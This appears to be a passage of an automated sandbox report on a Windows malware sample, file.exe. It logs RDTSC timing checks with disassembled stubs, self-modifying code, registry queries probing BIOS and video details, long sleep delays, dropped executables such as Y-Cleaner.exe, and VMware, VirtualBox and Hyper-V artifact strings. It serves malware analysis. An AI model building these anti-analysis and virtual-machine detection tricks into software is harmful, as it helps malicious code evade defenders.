Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91881 second address: 4D91885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91885 second address: 4D9188B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9188B second address: 4D91891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91891 second address: 4D91895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91895 second address: 4D91899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91899 second address: 4D918D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007FFAA4B0AF28h 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAA4B0AF27h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0537 second address: 4DB0572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAA4EF80CBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAA4EF80D0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0572 second address: 4DB0578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0578 second address: 4DB057E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB057E second address: 4DB0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0582 second address: 4DB05BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FFAA4EF80D4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAA4EF80D7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB05BA second address: 4DB05C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB05C0 second address: 4DB05C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70517 second address: 4D7051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7051C second address: 4D7052C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7052C second address: 4D70530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70530 second address: 4D70536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70536 second address: 4D7053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7053E second address: 4D7054E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov al, dl 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7054E second address: 4D705A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF22h 0x00000009 popad 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 popad 0x00000011 push dword ptr [ebp+04h] 0x00000014 jmp 00007FFAA4B0AF1Fh 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c jmp 00007FFAA4B0AF26h 0x00000021 push dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FFAA4B0AF1Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D705A8 second address: 4D705B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D705B7 second address: 4D705BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D705BD second address: 4D705C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91C05 second address: 4D91C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAA4B0AF1Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91C2D second address: 4D91C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FFAA4EF80CEh 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5049D second address: 4D504A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504A1 second address: 4D504A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504A7 second address: 4D504F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc eax 0x0000000a jmp 00007FFAA4B0AF1Eh 0x0000000f lock xadd dword ptr [ecx], eax 0x00000013 jmp 00007FFAA4B0AF20h 0x00000018 inc eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007FFAA4B0AF1Dh 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504F6 second address: 4D50527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FFAA4EF80CCh 0x00000013 adc eax, 2C2E57D8h 0x00000019 jmp 00007FFAA4EF80CBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50527 second address: 4D50531 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov dh, cl 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0936 second address: 4DA094E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CB3 second address: 4DA0CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4641660Ah 0x00000008 mov dh, D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 mov bl, 65h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FFAA4B0AF1Eh 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CDD second address: 4DA0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CE1 second address: 4DA0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 380AE172h 0x00000012 jmp 00007FFAA4B0AF23h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0B39 second address: 4DA0BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFAA4EF80CDh 0x00000014 xor ecx, 51DB35C6h 0x0000001a jmp 00007FFAA4EF80D1h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FFAA4EF80D0h 0x00000026 sbb eax, 2E188E68h 0x0000002c jmp 00007FFAA4EF80CBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push edx 0x00000039 pop eax 0x0000003a pushfd 0x0000003b jmp 00007FFAA4EF80D7h 0x00000040 jmp 00007FFAA4EF80D3h 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0931 second address: 4DB09A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAA4B0AF1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, 9Dh 0x00000013 pushfd 0x00000014 jmp 00007FFAA4B0AF1Ah 0x00000019 or ax, 9BB8h 0x0000001e jmp 00007FFAA4B0AF1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov di, cx 0x0000002a mov ebx, ecx 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 jmp 00007FFAA4B0AF1Fh 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FFAA4B0AF25h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0296 second address: 4DC029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC029C second address: 4DC02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC02A0 second address: 4DC02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAA4EF80CBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC02B6 second address: 4DC02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov di, 6B46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A52 second address: 4D80A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A58 second address: 4D80A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A5E second address: 4D80A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A62 second address: 4D80A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FFAA4B0AF24h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFAA4B0AF27h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A9B second address: 4D80AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AA1 second address: 4D80AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D505A0 second address: 4D505A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D505A6 second address: 4D50636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FFAA4B0AF20h 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAA4B0AF1Ch 0x0000001b add cl, FFFFFFB8h 0x0000001e jmp 00007FFAA4B0AF1Bh 0x00000023 popfd 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007FFAA4B0AF24h 0x0000002d adc ch, 00000018h 0x00000030 jmp 00007FFAA4B0AF1Bh 0x00000035 popfd 0x00000036 popad 0x00000037 or eax, FFFFFFFFh 0x0000003a jmp 00007FFAA4B0AF26h 0x0000003f lock xadd dword ptr [ecx], eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50636 second address: 4D5063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5063A second address: 4D50640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50640 second address: 4D506A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFAA4EF80D2h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FFAA4EF80CBh 0x0000000f sbb si, 74EEh 0x00000014 jmp 00007FFAA4EF80D9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d dec eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFAA4EF80D8h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506A1 second address: 4D506B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506B0 second address: 4D506B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506B6 second address: 4D506BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C65 second address: 4D70C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edx, 3153A514h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAA4EF80D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C89 second address: 4D70C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C9B second address: 4D70C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70C9F second address: 4D70CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e pushfd 0x0000000f jmp 00007FFAA4B0AF26h 0x00000014 or al, 00000058h 0x00000017 jmp 00007FFAA4B0AF1Bh 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFAA4B0AF20h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70CE9 second address: 4D70CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91A34 second address: 4D91AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAA4B0AF1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FFAA4B0AF21h 0x00000017 or esi, 53E70866h 0x0000001d jmp 00007FFAA4B0AF21h 0x00000022 popfd 0x00000023 mov eax, 5C89F897h 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FFAA4B0AF24h 0x00000031 add cx, 0338h 0x00000036 jmp 00007FFAA4B0AF1Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 call 00007FFAA4B0AF22h 0x00000047 pop esi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D91AD3 second address: 4D91AF8 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, 59151EF3h 0x0000000c popad 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAA4EF80D5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00C8 second address: 4DA00CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00CE second address: 4DA00D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00D2 second address: 4DA00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA00D6 second address: 4DA0141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FFAA4EF80D9h 0x00000010 sub si, B586h 0x00000015 jmp 00007FFAA4EF80D1h 0x0000001a popfd 0x0000001b mov eax, 69225737h 0x00000020 popad 0x00000021 xchg eax, ecx 0x00000022 pushad 0x00000023 call 00007FFAA4EF80D8h 0x00000028 mov ch, 44h 0x0000002a pop ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d call 00007FFAA4EF80CAh 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8257B0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CEE36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CF1F8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CDB93 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9F3F4E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A5BB78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AE7D5 rdtsc 0_2_009AE7D5
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe TID: 7604 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7608 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 160 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 179 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 176 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 176 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 36 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 81 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 79 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 80 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 81 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7680 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7612 Thread sleep count: 33 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7612 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7588 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7596 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7592 Thread sleep time: -38019s >= -30000s
Source: file.exe, file.exe, 00000000.00000002.2403256104.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2403940495.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2405607340.00000000055E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
